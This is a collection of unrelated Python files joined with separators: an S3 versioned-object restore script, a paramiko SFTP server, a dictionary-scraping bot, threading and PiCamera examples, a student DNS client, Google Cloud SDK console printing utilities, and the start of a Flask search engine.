RED + BOLD + '>> ' + END + 'Calling {0} with args {1} and kwargs {2}'.format(
fn.__name__,
arg_string, kwargs))
logger.log(debug_level, string)
wrapped_fn = fn
if not asyncio.iscoroutine(fn):
wrapped_fn = asyncio.coroutine(fn)
result = yield from wrapped_fn(*args, **kwargs)
if not supress_result:
string = BLUE + BOLD + '<< ' + END + 'Return {0} with result : {1}'.format(fn.__name__, result)
logger.log(debug_level, string)
return result
return func
return decorator
|
s3booster-restore-version.py
|
#!/bin/env python3
'''
** Chaveat: not suitable for millions of files, it shows slow performance to get object list
ChangeLogs
- 2021.07.24:
- 2021.07.23: applying multiprocessing.queue + process instead of pool
- 2021.07.21: modified getObject function
- for parallel processing, multiprocessing.Pool used
- used bucket.all instead of paginator
- 2021.07.20: first created
'''
#requirement
## python 3.4+
## boto3
import os
import boto3
import botocore
import multiprocessing
from os import path, makedirs
from datetime import datetime, timezone
from botocore.exceptions import ClientError
#region = 'us-east-2' ## change it with your region
prefix_list = ['data1/']
##Common Variables
region = 'ap-northeast-2' ## change it with your region
bucket_name = 'your-bucket-versioned'
max_process = 512
endpoint='https://s3.'+region+'.amazonaws.com'
debug_en = False
# CMD variables
cmd='restore_obj_version' ## supported_cmd: 'download|del_obj_version|restore_obj_version'
#cmd='del_obj_version' ## supported_cmd: 'download|del_obj_version|restore_obj_version'
#restore_deleted_time = datetime(2019, 10, 22, 20, 0, 0, tzinfo=timezone.utc)
# end of variables ## you don't need to modify below codes.
quit_flag = 'DONE'
if os.name == 'posix':
multiprocessing.set_start_method("fork")
# S3 session
#s3 = boto3.client('s3', region)
s3 = boto3.resource('s3',endpoint_url=endpoint, region_name=region)
bucket = s3.Bucket(bucket_name)
# execute multiprocessing
def run_multip(max_process, exec_func, q):
p_list = []
for i in range(max_process):
p = multiprocessing.Process(target = exec_func, args=(q,))
p_list.append(p)
p.daemon = True
p.start()
return p_list
def finishq(q, p_list):
for j in range(max_process):
q.put(quit_flag)
for pi in p_list:
pi.join()
# restore versioned objects
def restore_get_obj_delmarker(sub_prefix, q):
num_obj=0
s3_client = boto3.client('s3')
# using paginator to iterate over 1000 keys
paginator = s3_client.get_paginator('list_object_versions')
pages = paginator.paginate(Bucket=bucket_name, Prefix=sub_prefix)
for page in pages:
if 'DeleteMarkers' in page.keys():
for delmarker_obj in page['DeleteMarkers']:
key = delmarker_obj['Key']
vid = delmarker_obj['VersionId']
mp_data = (key, vid)
#print('restore mp_data:', mp_data)
q.put(mp_data)
num_obj+=1
else:
print('no delmarker')
return num_obj
def restore_obj_version(q):
while True:
mp_data = q.get()
if mp_data == quit_flag:
break
key = mp_data[0] # keyname
vid = mp_data[1] # versionid
try:
obj_version = s3.ObjectVersion(bucket_name, key, vid)
obj_version.delete()
print("[dubug2] object(%s, %s) is restored" %(key, vid))
except Exception as e:
print("[warning] restoring object(%s, %s) is failed" % (key, vid))
print(e)
def restore_obj_version_multi(s3_dirs):
q = multiprocessing.Queue()
total_obj = 0
for s3_dir in s3_dirs:
# multiprocessing tasks
print("[Information] %s directory is restoring" % s3_dir)
p_list = run_multip(max_process, restore_obj_version, q)
# get object list and ingest to processes
num_obj = restore_get_obj_delmarker(s3_dir, q)
# sending quit_flag and join processes
finishq(q, p_list)
print("[Information] %s is restored" % s3_dir)
total_obj += num_obj
return total_obj
def s3_booster_help():
print("example: python3 s3_restore_latest_version.sh")
# start main function
if __name__ == '__main__':
#print("starting script...")
start_time = datetime.now()
s3_dirs = prefix_list
if cmd == 'restore_obj_version':
total_files = restore_obj_version_multi(s3_dirs)
else:
s3_booster_help
end_time = datetime.now()
print('=============================================')
#for d in down_dir:
# stored_dir = local_dir + d
# print("[Information] Download completed, data stored in %s" % stored_dir)
print('Duration: {}'.format(end_time - start_time))
print('Total File numbers: %d' % total_files)
print('S3 Endpoint: %s' % endpoint)
print("ended")
|
__init__.py
|
import time
import socket
import paramiko
import logging
from src.s3_sftp_si import S3SFTPServerInterface
from src.sftp_si import S3ServerInterface
from src.config import AppConfig
from paramiko.ssh_exception import SSHException
import threading
BACKLOG = 10
def client_connection(server_socket, conn, addr, config):
remote_ip,remote_port = addr
try:
logging.info(f"Connection from {remote_ip}:{remote_port}")
if remote_ip == "10.31.112.24": return
transport = paramiko.Transport(conn)
transport.add_server_key(config.private_key)
transport.set_subsystem_handler(
'sftp', paramiko.SFTPServer, S3SFTPServerInterface, config=config)
server = S3ServerInterface(allowed_keys=config.keys)
transport.start_server(server=server)
channel = transport.accept()
while transport.is_active():
time.sleep(1)
except EOFError as err:
logging.debug(err)
pass
except SSHException as err:
logging.debug(err)
logging.error(f'Error handling connection: {str(err)}')
def start_server(config):
logging.info("Starting server")
logging.debug('Config: ' + str(config.asDict()))
#paramiko_level = getattr(paramiko.common, config.log_level)
#paramiko.common.logging.basicConfig(level=paramiko_level)
transport_log = logging.getLogger('paramiko.transport')
transport_log.setLevel(logging.CRITICAL)
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
server_socket.bind((config.listen_addr, config.listen_port))
server_socket.listen(BACKLOG)
while True:
conn, addr = server_socket.accept()
t = threading.Thread(target=client_connection, args=(server_socket, conn, addr, config,))
t.start()
|
bot.py
|
#!/usr/bin/env python
import sys
import os
import math
import traceback
from multiprocessing import Process
# local modules
import forvo
import api
from models import Term, File, TermWithData
# data sources
# import cambridge
import unsplash
import multitran
import merriamwebster
import howjsay
import macmillan
# here you can temporarily remove sources that you don't need to test
sources = [
# cambridge,
merriamwebster,
unsplash,
multitran,
howjsay,
macmillan,
forvo,
]
reverse_edges = {
'transcription': 'transcription_of',
'definition': 'definition_of',
'collocation': 'collocation_of',
}
words = []
__dir__ = os.path.dirname(os.path.realpath(__file__))
TERMS = {} # key=text@lang, value=uid
__next_id__ = 1
def next_id(prefix):
global __next_id__
id = prefix + str(__next_id__)
__next_id__ += 1
return id
# TODO refactor as generator
def read_words():
with open(os.path.join(__dir__, 'us1000.txt'), 'r', encoding='utf-8') as f:
lines = f.read().split('\n')
lines = [s.strip() for s in lines]
return [s for s in lines if len(s) > 0]
def key_of(text, lang):
return f'{format}@{lang}'
def define_term(data):
if not isinstance(data, Term):
print("bad term", data)
return None
text = data.text.strip()
# print(f'TERM {text}')
key = key_of(text, data.lang)
if key in TERMS:
return TERMS[key]
id = api.add_term(text, data.lang, data.region)
TERMS[key] = id
return id
def push_data(term_id, data):
for (k, a) in data:
edges = []
for v in a:
is_file = isinstance(v, File)
if is_file:
# TODO optimize adding file with region
file = api.fileproxy(v.url, as_is=True)
related_id = file['uid']
if v.region:
edges.append([related_id, 'region', v.region])
elif isinstance(v, TermWithData):
related_id = define_term(v.term)
if related_id is None:
print("bad term", v.term)
continue
push_data(related_id, v.data)
else:
related_id = define_term(v)
if related_id is None:
print("bad term", v)
continue
edges.append([term_id, k, related_id])
if not is_file:
reverse_edge = reverse_edges[k] if k in reverse_edges else k
edges.append([related_id, reverse_edge, term_id])
if len(edges) > 0:
api.update_graph(edges)
def get_data_safe(source, text, lang):
try:
return source.get_data(text, lang)
except:
print(f'{source.NAME}.get_data({text}, {lang}) fail:')
traceback.print_exc()
return None
def define_word(text, lang='en', source_idx=-1, count=1):
term_id = define_term(Term(text=text, lang=lang, region=None))
source_list = sources if source_idx < 0 else sources[
source_idx:source_idx + count]
for source in source_list:
data = get_data_safe(source, text, lang)
if data is None:
sys.exit(-1)
push_data(term_id, data)
def define_words(source_idx=1, count=1):
api.login("system", os.getenv("SYSTEM_PWD"))
for word in words:
define_word(word, source_idx=source_idx, count=count)
def main():
global words
word = sys.argv[1] if len(sys.argv) >= 2 else None
if word:
words = [word]
else:
words = read_words()
plimit = float(int(os.getenv("PARALLEL", "1")))
if plimit == 1:
for i, src in enumerate(sources):
print(f'FETCH {src.NAME}')
try:
define_words(source_idx=i)
print(f'COMPLETED {src.NAME}')
except:
print(f'FAIL {src.NAME}')
traceback.print_exc()
return
step = math.ceil(len(sources) / plimit)
for i in range(0, len(sources), step):
p = Process(target=define_words, args=(i, step))
p.start()
p.join()
if __name__ == '__main__':
main()
|
20-thread.py
|
def sync_consume():
while True:
print(q.get())
q.task_done()
def sync_produce():
consumer = Thread(target=sync_consume, daemon=True)
consumer.start()
for i in range(10):
q.put(i)
q.join()
sync_produce()
|
picam_video_input_stream.py
|
from queue import Empty, Queue
from threading import Thread
from picamera import PiCamera
from picamera.array import PiRGBArray
from visutils.video import VideoInputStream
class PicamVideoInputStream(VideoInputStream):
def __init__(self, src: int, is_live=False, buffer_size=128,
resolution=(320, 240), framerate=32, **kwargs):
# initialize the camera
self._camera = PiCamera(src)
# set camera parameters
self._camera.resolution = resolution
self._camera.framerate = framerate
# set optional camera parameters (refer to PiCamera docs)
for (arg, value) in kwargs.items():
setattr(self._camera, arg, value)
# initialize the video
self._rawCapture = PiRGBArray(self._camera, size=resolution)
self._stream = self._camera.capture_continuous(self._rawCapture,
format="bgr",
use_video_port=True)
self._is_live = is_live
self._buffer = Queue(maxsize=buffer_size)
self._thread = Thread(target=self._update, args=())
self._thread.daemon = True
self._frame = None
self._stopped = False
def start(self):
self._thread.start()
def _update(self):
while not self._stopped:
stream = next(self._stream)
frame = stream.array
if self._is_live:
self._clear_buffer()
self._buffer.put(frame)
# grab the frame from the video and clear the video in
# preparation for the next frame
self._rawCapture.seek(0)
self._rawCapture.truncate()
self._stream.close()
self._rawCapture.close()
self._camera.close()
def read(self):
return self._buffer.get()
def _shutdown(self):
self._stopped = True
self._clear_buffer()
self._buffer.put(None)
def _clear_buffer(self):
while not self._buffer.empty():
try:
self._buffer.get_nowait()
except Empty:
pass
def stop(self):
self._shutdown()
self._thread.join()
|
__main__.py
|
from threading import Thread
from src.gui import GUI_MainThread
from src.simulator import Sim_MainThread
#g_thr = Thread(target=GUI_MainThread)
s_thr = Thread(target=Sim_MainThread)
s_thr.start()
GUI_MainThread()
#g_thr.start()
|
client.py
|
# Anthony Tiongson (ast119) with assistance from Nicolas Gundersen (neg62)
# Client side DNS
#
# resources:
# https://www.pythonforbeginners.com/files/reading-and-writing-files-in-python
# https://www.pythonforbeginners.com/system/python-sys-argv
# https://www.w3schools.com/python/ref_string_split.asp
# https://www.geeksforgeeks.org/args-kwargs-python/
import socket, sys, threading, time
# socketOpen function to open and return a socket in a given port designated by a label.
def socketOpen(label, port):
try:
socketOpen = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socketOpenPrompt = "Socket opened to connect to " + label + ": port " + str(port) + "\n"
print(socketOpenPrompt)
return socketOpen
except socket.error as socketOpenError:
socketOpenError = label + ' socket already open, error: {} \n'.format(socketError)
print(socketOpenError)
exit()
# socketBind function to establish and return a socket binding using a given hostname and port and designated by a label.
def socketBind(label, hostname, port):
# Define the IP address on which you want to connect to the LS server.
IPAddress = socket.gethostbyname(hostname)
print("Hostname on which to connect to " + label + " server: " + hostname + "\n" + "IP address: " + str(IPAddress) + "\n")
socketBind = (IPAddress, port)
return socketBind
# queryFile function connects to a server of a given hostname and port designated by a label and reads a given file input of queries to send to the server. The result of each the query is then written to a given file output.
def queryFile(label, hostname, port, input, output):
# Read a line from an input file list of hostnames, connect to a server, send that hostname to the server, close connection after receiving a response, commit results to an output file.
for line in input:
# Open server socket.
server = socketOpen(label, port)
# Create server socketBind and connect to the server.
server.connect(socketBind(label, hostname, port))
query = line.splitlines()[0].lower()
querySentPrompt = "Sending \"" + query + "\" to " + label + "...\n"
print(querySentPrompt)
server.send(query.encode('utf-8'))
responseFromServer = server.recv(256)
responsePrompt = "Response received from the " + label + ": {}\n".format(responseFromServer.decode('utf-8'))
print(responsePrompt)
# Close connection to server socket.
print("Closing " + label + " socket connection.\n")
server.close()
output.write(responseFromServer + "\n")
# shutdownServer function sends a shutdown command to a server with a given hostname and port designated by a label.
def shutdownServer(label, hostname, port):
# Tell the server to shut down and close connection.
# Open server socket.
server = socketOpen(label, port)
# Create server socketBind and connect to the server.
server.connect(socketBind(label, hostname, port))
# Send shutdown command.
print("Shutting down " + label + "...\n")
shutdownCommand = "shutdown" + label
server.send(shutdownCommand.encode('utf-8'))
# Close connection to server socket.
print("Closing " + label + " socket connection.\n")
server.close()
# shutdown function closes given files and shuts down the client.
def shutdown(*files):
print("Closing files...")
for file in files:
file.close()
print("Shutting down client.")
exit()
# client function takes in a given server's label, an input file object with a list of hostnames to query, and an output file object to write results.
def client(serverLabel, hostnameQueryFile, results):
# Establish server hostname.
hostname = str(sys.argv[1])
# Establish server port via command-line argument.
port = int(sys.argv[2])
# Read all hostnames in hostnameQueryFile to query the server and write responses in the file results.
queryFile(serverLabel, hostname, port, hostnameQueryFile, results)
# Send shutdown command to server once file is completely queried.
shutdownServer(serverLabel, hostname, port)
# Close all files and shutdown client.
shutdown(hostnameQueryFile, results)
if __name__ == "__main__":
# Set label for server client will connect to
serverLabel = "LSServer"
# Create file object to read list of hostnames to query.
hostnameQueryFile = open("PROJ2-HNS.txt", "r")
# Create file object to write all outputs.
results = open("RESOLVED.txt", "a")
thread = threading.Thread(name='client', target = client, args = (serverLabel, hostnameQueryFile, results,))
thread.start()
sleepTime = 5
executionPrompt = "\nClient thread executed, sleep time: " + str(sleepTime) + " sec\n"
print(executionPrompt)
time.sleep(sleepTime)
|
console_io.py
|
# Copyright 2013 Google Inc. All Rights Reserved.
"""General console printing utilities used by the Cloud SDK."""
import logging
import string
import sys
import textwrap
import threading
import time
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
class Error(exceptions.Error):
"""Base exception for the module."""
pass
class UnattendedPromptError(Error):
"""An exception for when a prompt cannot be answered."""
def __init__(self):
super(UnattendedPromptError, self).__init__(
'This prompt could not be answered because you are not in an '
'interactive session. You can re-run the command with the --quiet '
'flag to accept default answers for all prompts.')
class TablePrinter(object):
"""Provides the ability to print a list of items as a formatted table.
Using this class helps you adhere to the gcloud style guide.
The table will auto size the columns to fit the maximum item length for that
column. You can also choose how to justify each column and to add extra
padding to each column.
"""
JUSTIFY_LEFT = '<'
JUSTIFY_RIGHT = '>'
JUSTIFY_CENTER = '^'
def __init__(self, headers, title=None,
justification=None, column_padding=None):
"""Creates a new TablePrinter.
Args:
headers: A tuple of strings that represent the column headers titles.
This can be a tuple of empty strings or None's if you do not want
headers displayed. The number of empty elements in the tuple must match
the number of columns you want to display.
title: str, An optional title for the table.
justification: A tuple of JUSTIFY_LEFT, JUSTIFY_RIGHT, JUSTIFY_CENTER that
describes the justification for each column. This must have the same
number of items as the headers tuple.
column_padding: A tuple of ints that describes the extra padding that
should be added to each column. This must have the same
number of items as the headers tuple.
Raises:
ValueError: If the justification or column_padding tuples are not of the
correct type or length.
"""
self.__headers = [h if h else '' for h in headers]
self.__title = title
self.__num_columns = len(self.__headers)
self.__header_widths = [len(str(x)) for x in self.__headers]
self.__column_padding = column_padding
if self.__column_padding is None:
self.__column_padding = tuple([0] * self.__num_columns)
if (not isinstance(self.__column_padding, (tuple)) or
len(self.__column_padding) != self.__num_columns):
raise ValueError('Column padding tuple does not have {0} columns'
.format(self.__num_columns))
self.__justification = justification
if self.__justification is None:
self.__justification = tuple([TablePrinter.JUSTIFY_LEFT] *
self.__num_columns)
if (not isinstance(self.__justification, tuple) or
len(self.__justification) != self.__num_columns):
raise ValueError('Justification tuple does not have {0} columns'
.format(self.__num_columns))
for value in self.__justification:
if not (value is TablePrinter.JUSTIFY_LEFT or
value is TablePrinter.JUSTIFY_RIGHT or
value is TablePrinter.JUSTIFY_CENTER):
raise ValueError('Justification values must be one of JUSTIFY_LEFT, '
'JUSTIFY_RIGHT, or JUSTIFY_CENTER')
def SetTitle(self, title):
"""Sets the title of the table.
Args:
title: str, The new title.
"""
self.__title = title
def Log(self, rows, logger=None, level=logging.INFO):
"""Logs the given rows to the given logger.
Args:
rows: list of tuples, The rows to log the formatted table for.
logger: logging.Logger, The logger to do the logging. If None, the root
logger will be used.
level: logging level, An optional override for the logging level, INFO by
default.
"""
if not logger:
logger = log.getLogger()
lines = self.GetLines(rows)
for line in lines:
logger.log(level, line)
def Print(self, rows, output_stream=None, indent=0):
"""Prints the given rows to stdout.
Args:
rows: list of tuples, The rows to print the formatted table for.
output_stream: file-like object, The stream to wire the rows to. Defaults
to log.out if not given.
indent: int, The number of spaces to indent all lines of the table.
"""
if not output_stream:
output_stream = log.out
lines = self.GetLines(rows, indent=indent)
for line in lines:
output_stream.write(line + '\n')
def GetLines(self, rows, indent=0):
"""Gets a list of strings of formatted lines for the given rows.
Args:
rows: list of tuples, The rows to get the formatted table for.
indent: int, The number of spaces to indent all lines of the table.
Returns:
list of str, The lines of the formatted table that can be printed.
Raises:
ValueError: If any row does not have the correct number of columns.
"""
column_widths = list(self.__header_widths)
for row in rows:
if len(row) != self.__num_columns:
raise ValueError('Row [{row}] does not have {rows} columns'
.format(row=row, rows=self.__num_columns))
# Find the max width of each column
for i in range(self.__num_columns):
column_widths[i] = max(column_widths[i], len(str(row[i])))
# Add padding
column_widths = [column_widths[i] + self.__column_padding[i]
for i in range(self.__num_columns)]
total_width = (len(column_widths) - 1) * 3
for width in column_widths:
total_width += width
edge_line = ('--' +
'---'.join(['-' * width for width in column_widths]) +
'--')
title_divider_line = ('|-' +
'---'.join(['-' * width for width in column_widths]) +
'-|')
divider_line = ('|-' +
'-+-'.join(['-' * width for width in column_widths]) +
'-|')
lines = [edge_line]
if self.__title:
title_line = '| {{title:{justify}{width}s}} |'.format(
justify=TablePrinter.JUSTIFY_CENTER, width=total_width).format(
title=self.__title)
lines.append(title_line)
lines.append(title_divider_line)
# Generate format strings with the correct width for each column
column_formats = []
for i in range(self.__num_columns):
column_formats.append('{{i{i}:{justify}{width}s}}'.format(
i=i, justify=self.__justification[i], width=column_widths[i]))
pattern = '| ' + ' | '.join(column_formats) + ' |'
def _ParameterizedArrayDict(array):
return dict(('i{i}'.format(i=i), array[i]) for i in range(len(array)))
if [h for h in self.__headers if h]:
# Only print headers if there is at least one non-empty header
lines.append(pattern.format(**_ParameterizedArrayDict(self.__headers)))
lines.append(divider_line)
lines.extend([pattern.format(**_ParameterizedArrayDict(row))
for row in rows])
lines.append(edge_line)
if indent:
return [(' ' * indent) + l for l in lines]
return lines
class ListPrinter(object):
"""Provides the ability to print a list of items as a formatted list.
Using this class helps you adhere to the gcloud style guide.
"""
def __init__(self, title):
"""Create a titled list printer that can print rows to stdout.
Args:
title: A string for the title of the list.
"""
self.__title = title
def Print(self, rows, output_stream=None):
"""Print this list with the provided rows to stdout.
Args:
rows: A list of objects representing the rows of this list. Before being
printed, they will be converted to strings.
output_stream: file-like object, The stream to wire the rows to. Defaults
to log.out if not given.
"""
if not output_stream:
output_stream = log.out
output_stream.write(self.__title + '\n')
for row in rows:
output_stream.write(' - ' + str(row) + '\n')
TEXTWRAP = textwrap.TextWrapper(replace_whitespace=False,
drop_whitespace=False,
break_on_hyphens=False)
def _DoWrap(message):
"""Text wrap the given message and correctly handle newlines in the middle.
Args:
message: str, The message to wrap. It may have newlines in the middle of
it.
Returns:
str, The wrapped message.
"""
return '\n'.join([TEXTWRAP.fill(line) for line in message.splitlines()])
def _RawInput(prompt=None):
"""A simple redirect to the built-in raw_input function.
If the prompt is given, it is correctly line wrapped.
Args:
prompt: str, An optional prompt.
Returns:
The input from stdin.
"""
if prompt:
sys.stderr.write(_DoWrap(prompt))
try:
return raw_input()
except EOFError:
return None
def IsInteractive():
"""Determines if the current terminal session is interactive."""
return sys.stdin.isatty()
def PromptContinue(message=None, prompt_string=None, default=True,
throw_if_unattended=False):
"""Prompts the user a yes or no question and asks if they want to continue.
Args:
message: str, The prompt to print before the question.
prompt_string: str, An alternate yes/no prompt to display. If None, it
defaults to 'Do you want to continue'.
default: bool, What the default answer should be. True for yes, False for
no.
throw_if_unattended: bool, If True, this will throw if there was nothing
to consume on stdin and stdin is not a tty.
Raises:
UnattendedPromptError: If there is no input to consume and this is not
running in an interactive terminal.
Returns:
bool, False if the user said no, True if the user said anything else or if
prompts are disabled.
"""
if properties.VALUES.core.disable_prompts.GetBool():
return default
if not prompt_string:
prompt_string = 'Do you want to continue'
if message:
sys.stderr.write(_DoWrap(message) + '\n\n')
if default:
prompt_string += ' (Y/n)? '
else:
prompt_string += ' (y/N)? '
sys.stderr.write(_DoWrap(prompt_string))
while True:
answer = _RawInput()
# pylint:disable=g-explicit-bool-comparison, We explicitly want to
# distinguish between empty string and None.
if answer == '':
# User just hit enter, return default.
sys.stderr.write('\n')
return default
elif answer is None:
# This means we hit EOF, no input or user closed the stream.
if throw_if_unattended and not IsInteractive():
sys.stderr.write('\n')
raise UnattendedPromptError()
else:
sys.stderr.write('\n')
return default
elif answer.lower() in ['y', 'yes']:
sys.stderr.write('\n')
return True
elif answer.lower() in ['n', 'no']:
sys.stderr.write('\n')
return False
else:
sys.stderr.write("Please enter 'y' or 'n': ")
def PromptResponse(message):
"""Prompts the user for a string.
Args:
message: str, The prompt to print before the question.
Returns:
str, The string entered by the user, or None if prompts are disabled.
"""
if properties.VALUES.core.disable_prompts.GetBool():
return None
response = _RawInput(message)
return response
def PromptChoice(options, default=None, message=None, prompt_string=None):
"""Prompt the user to select a choice from a list of items.
Args:
options: [object], A list of objects to print as choices. Their str()
method will be used to display them.
default: int, The default index to return if prompting is disabled or if
they do not enter a choice.
message: str, An optional message to print before the choices are displayed.
prompt_string: str, A string to print when prompting the user to enter a
choice. If not given, a default prompt is used.
Raises:
ValueError: If no options are given or if the default is not in the range of
available options.
Returns:
The index of the item in the list that was chosen, or the default if prompts
are disabled.
"""
if not options:
raise ValueError('You must provide at least one option.')
maximum = len(options)
if default is not None and not 0 <= default < maximum:
raise ValueError(
'Default option [{default}] is not a valid index for the options list '
'[{maximum} options given]'.format(default=default, maximum=maximum))
if properties.VALUES.core.disable_prompts.GetBool():
return default
if message:
sys.stderr.write(_DoWrap(message) + '\n')
for i, option in enumerate(options):
sys.stderr.write(' [{index}] {option}\n'.format(
index=i + 1, option=str(option)))
if not prompt_string:
prompt_string = 'Please enter your numeric choice'
if default is None:
suffix_string = ': '
else:
suffix_string = ' ({default}): '.format(default=default + 1)
sys.stderr.write(_DoWrap(prompt_string + suffix_string))
while True:
answer = _RawInput()
if answer is None or (answer is '' and default is not None):
# Return default if we failed to read from stdin
# Return default if the user hit enter and there is a valid default
# Prompt again otherwise
sys.stderr.write('\n')
return default
try:
num_choice = int(answer)
if num_choice < 1 or num_choice > maximum:
raise ValueError('Choice must be between 1 and {maximum}'.format(
maximum=maximum))
sys.stderr.write('\n')
return num_choice - 1
except ValueError:
sys.stderr.write('Please enter a value between 1 and {maximum}: '
.format(maximum=maximum))
def LazyFormat(s, *args, **kwargs):
"""Format a string, allowing unresolved parameters to remain unresolved.
Args:
s: str, The string to format.
*args: [str], A list of strings for numerical parameters.
**kwargs: {str:str}, A dict of strings for named parameters.
Returns:
str, The lazily-formatted string.
"""
class SafeDict(dict):
def __missing__(self, key):
return '{' + key + '}'
return string.Formatter().vformat(s, args, SafeDict(kwargs))
def PrintExtendedList(items, col_fetchers):
"""Print a properly formated extended list for some set of resources.
If items is a generator, this function may elect to only request those rows
that it is ready to display.
Args:
items: [resource] or a generator producing resources, The objects
representing cloud resources.
col_fetchers: [(string, func(resource))], A list of tuples, one for each
column, in the order that they should appear. The string is the title
of that column which will be printed in a header. The func is a function
that will fetch a row-value for that column, given the resource
corresponding to the row.
"""
total_items = 0
rows = [[title for (title, unused_func) in col_fetchers]]
for item in items:
total_items += 1
row = []
for (unused_title, func) in col_fetchers:
value = func(item)
if value is None:
row.append('-')
else:
row.append(value)
rows.append(row)
max_col_widths = [0] * len(col_fetchers)
for row in rows:
for col in range(len(row)):
max_col_widths[col] = max(max_col_widths[col], len(str(row[col]))+2)
for row in rows:
for col in range(len(row)):
width = max_col_widths[col]
item = str(row[col])
if len(item) < width and col != len(row)-1:
item += ' ' * (width - len(item))
log.out.write(item)
log.out.write('\n')
if not total_items:
log.status.write('Listed 0 items.\n')
class ProgressTracker(object):
"""A context manager for telling the user about long-running progress."""
SPIN_MARKS = [
'|',
'/',
'-',
'\\',
]
def __init__(self, message, autotick=True):
self._message = message
self._prefix = message + '...'
self._ticks = 0
self._autotick = autotick
self._done = False
self._lock = threading.Lock()
def __enter__(self):
log.file_only_logger.info(self._prefix)
sys.stderr.write(self._prefix)
if self._autotick:
def Ticker():
while True:
time.sleep(1)
if self.Tick():
return
threading.Thread(target=Ticker).start()
return self
def Tick(self):
"""Give a visual indication to the user that some progress has been made."""
with self._lock:
if not self._done:
self._ticks += 1
self._Print()
sys.stderr.write(
ProgressTracker.SPIN_MARKS[
self._ticks % len(ProgressTracker.SPIN_MARKS)])
return self._done
def _Print(self):
sys.stderr.write('\r' + self._prefix)
def __exit__(self, unused_type, unused_value, unused_traceback):
with self._lock:
self._done = True
self._Print()
sys.stderr.write('done.\n')
class ProgressBar(object):
"""A simple progress bar for tracking completion of an action.
This progress bar works without having to use any control characters. It
prints the action that is being done, and then fills a progress bar below it.
You should not print anything else on the output stream during this time as it
will cause the progress bar to break on lines.
This class can also be used in a context manager.
"""
@staticmethod
def _DefaultCallback(progress_factor):
pass
DEFAULT_CALLBACK = _DefaultCallback
@staticmethod
def SplitProgressBar(original_callback, weights):
"""Splits a progress bar into logical sections.
Wraps the original callback so that each of the subsections can use the full
range of 0 to 1 to indicate its progress. The overall progress bar will
display total progress based on the weights of the tasks.
Args:
original_callback: f(float), The original callback for the progress bar.
weights: [float], The weights of the tasks to create. These can be any
numbers you want and the split will be based on their proportions to
each other.
Raises:
ValueError: If the weights don't add up to 1.
Returns:
(f(float), ), A tuple of callback functions, in order, for the subtasks.
"""
if (original_callback is None or
original_callback == ProgressBar.DEFAULT_CALLBACK):
return tuple([ProgressBar.DEFAULT_CALLBACK for _ in range(len(weights))])
def MakeCallback(already_done, weight):
def Callback(done_fraction):
original_callback(already_done + (done_fraction * weight))
return Callback
total = float(sum(weights))
callbacks = []
already_done = 0
for weight in weights:
normalized_weight = weight / total
callbacks.append(MakeCallback(already_done, normalized_weight))
already_done += normalized_weight
return tuple(callbacks)
def __init__(self, label, stream=log.status, total_ticks=60):
"""Creates a progress bar for the given action.
Args:
label: str, The action that is being performed.
stream: The output stream to write to, stderr by default.
total_ticks: int, The number of ticks wide to make the progress bar.
"""
self._stream = stream
self._ticks_written = 0
self._total_ticks = total_ticks
max_label_width = self._total_ticks - 4
if len(label) > max_label_width:
label = label[:max_label_width - 3] + '...'
elif len(label) < max_label_width:
diff = max_label_width - len(label)
label += ' ' * diff
self._label = '|- {label} -|'.format(label=label)
def Start(self):
"""Starts the progress bar by writing the label."""
self._stream.write(self._label + '\n')
self._stream.write('|')
self._ticks_written = 0
def SetProgress(self, progress_factor):
"""Sets the current progress of the task.
This method has no effect if the progress bar has already progressed past
the progress you call it with (since the progress bar cannot back up).
Args:
progress_factor: float, The current progress as a float between 0 and 1.
"""
expected_ticks = int(self._total_ticks * progress_factor)
new_ticks = expected_ticks - self._ticks_written
# Don't allow us to go over 100%.
new_ticks = min(new_ticks, self._total_ticks - self._ticks_written)
if new_ticks > 0:
self._stream.write('=' * new_ticks)
self._ticks_written += new_ticks
if expected_ticks == self._total_ticks:
self._stream.write('|\n')
self._stream.flush()
def Finish(self):
"""Mark the progress as done."""
self.SetProgress(1)
def __enter__(self):
self.Start()
return self
def __exit__(self, *args):
self.Finish()
|
index.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
UI - a simple web search engine.
The goal is to index an infinite list of URLs (web pages),
and then be able to quickly search relevant URLs against a query.
See https://github.com/AnthonySigogne/web-search-engine for more information.
"""
__author__ = "Anthony Sigogne"
__copyright__ = "Copyright 2017, Byprog"
__email__ = "[email protected]"
__license__ = "MIT"
__version__ = "1.0"
import os
import requests
from urllib import parse
from flask import Flask, request, jsonify, render_template
import sys
import time
import threading
from rank.query_test import query_test
from server.crawl_abstract import get_abstracts, get_urls
from utils.constants import permuterm, term2doc_dict
print("docs loaded:", len(permuterm), len(permuterm.keys()))
previous_search_res = None
abstract_Flag = True
previous_search_res_abs = []
search_res = None
search_titles = None
previous_query = None
current_start = 0
current_hits = 5
previous_search_time = 0
def create_app(test_config=None):
# create and configure the app
app = Flask(__name__, instance_relative_config=True)
app.config.from_mapping(
SECRET_KEY='dev',
DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),
)
if test_config is None:
# load the instance config, if it exists, when not testing
app.config.from_pyfile('config.py', silent=True)
else:
# load the test config if passed in
app.config.from_mapping(test_config)
# ensure the instance folder exists
try:
os.makedirs(app.instance_path)
except OSError:
pass
@app.route("/", methods=['GET'])
def search():
"""
URL : /
Query engine to find a list of relevant URLs.
Method : POST or GET (no query)
Form data :
- query : the search query
- hits : the number of hits returned by query
- start : the start of hits
Return a template view with the list of relevant URLs.
"""
global previous_search_res, previous_search_res_abs, search_res, previous_query, search_titles
global current_start, current_hits, previous_search_time, update_page_Flag, abstract_Flag
# GET data
query = request.args.get("query", None)
top_k = int(request.args.get("top_k", type=int, default=20))
doc_name = request.args.get("doc_name", type=str, default=None)
print("query is:", query)
start = request.args.get("start", 0, type=int)
hits = request.args.get("hits", 5, type=int)
print("start", start)
print("hits", hits)
if start < 0 or hits < 0:
return "Error, start or hits cannot be negative numbers"
if previous_query != query:
update_page_Flag = True
if previous_query != query or start != current_start:
abstract_Flag = True
if query:
try:
if previous_search_res is not None and previous_query == query:
search_time = previous_search_time
search_res = list(previous_search_res)[start:start + hits]
else:
start_time = time.time()
search_titles = list(query_test(query, top_k))
if len(search_titles) < top_k:
top_k = len(search_titles)
search_titles = search_titles[:top_k]
urls = get_urls(doc_names=search_titles)
end_time = time.time()
search_abstracts = [''] * top_k
